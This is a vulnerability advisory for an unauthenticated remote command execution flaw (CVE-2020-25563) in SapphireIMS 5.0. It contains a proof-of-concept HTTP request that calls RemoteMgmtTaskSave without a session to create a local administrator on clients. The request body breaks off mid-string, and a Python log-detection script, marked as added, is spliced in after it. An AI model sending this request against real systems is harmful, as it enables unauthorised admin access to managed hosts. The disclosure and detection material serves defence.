[CVE-2020-25563] SapphireIMS: Unauthenticated remote command execution (create local admin on clients)

Description

In SapphireIMS 5.0, it is possible to create a local administrator on any client without any credentials: the RemoteMgmtTaskSave (Automation Tasks) feature can be called directly without a JSESSIONID.

CVSS 3.0 Base Score

10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Researcher

Tanoy Bose

POC

POST /SapphireIMS/RemoteMgmtTaskSave?mainmenu=yes HTTP/1.1
Host: 192.168.191.48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1619
Origin: http://192.168.191.48
Connection: close
Referer: http://192.168.191.48/SapphireIMS/TaskConfiguration.jsp?jobTypeId=2017&TaskName=User%20Management&SubTaskName=User%20Account%20Creation&Taskid=1002&mainmenu=yes&SelectedSite=1
Upgrade-Insecure-Requests: 1

applicationLogoutTypeOldUI=0&nodupSite=1&mainMenuID=yes&WMIIndex=0&WMITabName=WMI&paramReq1=1&TabList=1&JobIDList=10005&IsparamRequired=1&JobID=10005&TabList=Scheduler&SNMPShowHosts=0&WMIShowHosts=1&WBEMShowHosts=0&SSHShowHosts=0&SelectedSite=1&SelectedTabList=1%2C10005%7C%26%26%7C&param_List=10005%2C1%240%2C1%241%7C%3D%
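A defender-side check for the condition the advisory describes (a task save reaching RemoteMgmtTaskSave with no JSESSIONID), added here as an example and not part of the original advisory. It assumes reverse-proxy access records as JSON lines with path, cookie and decoded body fields; the sample records are constructed, and the mapping of JobID 10005 to the account-creation task is an assumption based on the POC.

```python
"""Flag SapphireIMS RemoteMgmtTaskSave requests that carry no session cookie.

Added example, not from the advisory: scans reverse-proxy access records assumed
to be JSON lines with path, Cookie header and decoded POST body; SAMPLE_LOG is constructed.
"""
import json
from typing import List, Optional
from urllib.parse import parse_qs

# Endpoint named in CVE-2020-25563; JobID 10005 is the value seen in the POC and
# is assumed here to be the "User Account Creation" automation task.
TARGET_PATH = "/SapphireIMS/RemoteMgmtTaskSave"
POC_JOB_ID = "10005"

SAMPLE_LOG = """
{"src": "10.0.0.5", "method": "POST", "path": "/SapphireIMS/RemoteMgmtTaskSave", "cookie": "", "body": "JobID=10005&TabList=Scheduler&SelectedSite=1"}
{"src": "10.0.0.9", "method": "POST", "path": "/SapphireIMS/RemoteMgmtTaskSave", "cookie": "JSESSIONID=ABC123", "body": "JobID=10005&SelectedSite=1"}
{"src": "10.0.0.7", "method": "GET", "path": "/SapphireIMS/TaskConfiguration.jsp", "cookie": "", "body": ""}
""".strip()

def has_session(cookie_header: str) -> bool:
    """True when the Cookie header carries a non-empty JSESSIONID."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "JSESSIONID" and value:
            return True
    return False

def classify(record: dict) -> Optional[str]:
    """Return a finding label for one access record, or None if nothing to report."""
    if record.get("path") != TARGET_PATH:
        return None
    job = parse_qs(record.get("body", "")).get("JobID", [""])[0]
    if not has_session(record.get("cookie", "")):
        # Task saved with no session at all: the CVE-2020-25563 condition.
        return f"unauth-task-save job={job or '?'} src={record['src']}"
    if job == POC_JOB_ID:
        # Authenticated, but still worth review: account creation on managed clients.
        return f"audit-account-creation-task src={record['src']}"
    return None

def scan(log_text: str) -> List[str]:
    """Run classify() over every non-empty line and collect the findings."""
    findings = [classify(json.loads(l)) for l in log_text.splitlines() if l.strip()]
    return [f for f in findings if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Standard access logs usually do not record the Cookie header or the POST body, so a proxy or application log that captures both is needed for this check to be meaningful.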


Disclosure timelines

  • 07 May, 2020 - Vendor informed; failed
  • 16 Sept, 2020 - Cert-CC and Cert-In Informed